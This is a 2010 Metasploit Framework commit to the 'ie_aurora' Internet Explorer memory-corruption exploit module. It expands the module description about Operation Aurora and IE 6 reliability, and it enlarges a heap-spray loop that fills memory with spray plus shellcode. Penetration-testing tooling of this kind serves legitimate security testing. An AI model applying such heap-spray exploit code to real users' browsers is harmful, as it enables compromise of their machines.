From 69f609bdcd4ecccdf8fdb3635599a5294da9cbaa Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 16 Jan 2010 00:55:42 +0000 Subject: [PATCH] Updated description to make the source of the exploit clear and why it only triggers reliably vs 6 now. Adjusts the heap spray to be slightly bigger git-svn-id: file:///home/svn/framework3/trunk@8138 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/windows/browser/ie_aurora.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/ie_aurora.rb b/modules/exploits/windows/browser/ie_aurora.rb index 080799110f..b435297dd5 100644 --- a/modules/exploits/windows/browser/ie_aurora.rb +++ b/modules/exploits/windows/browser/ie_aurora.rb @@ -31,7 +31,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Microsoft Internet Explorer "Aurora" Memory Corruption', 'Description' => %q{ This module exploits a memory corruption flaw in Internet Explorer. This - flaw was found in the wild. + flaw was found in the wild and was a key component of the "Operation Aurora" + attacks that lead to the compromise of a number of high profile companies. The + exploit code is a direct port of the public sample published to the Wepawet + malware analysis site. The technique used by this module is currently identical + to the public sample, as such, only Internet Explorer 6 can be reliably exploited. }, 'License' => MSF_LICENSE, 'Author' => @@ -125,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 ); - for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode}; + for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode}; } function #{var_ev1}(evt){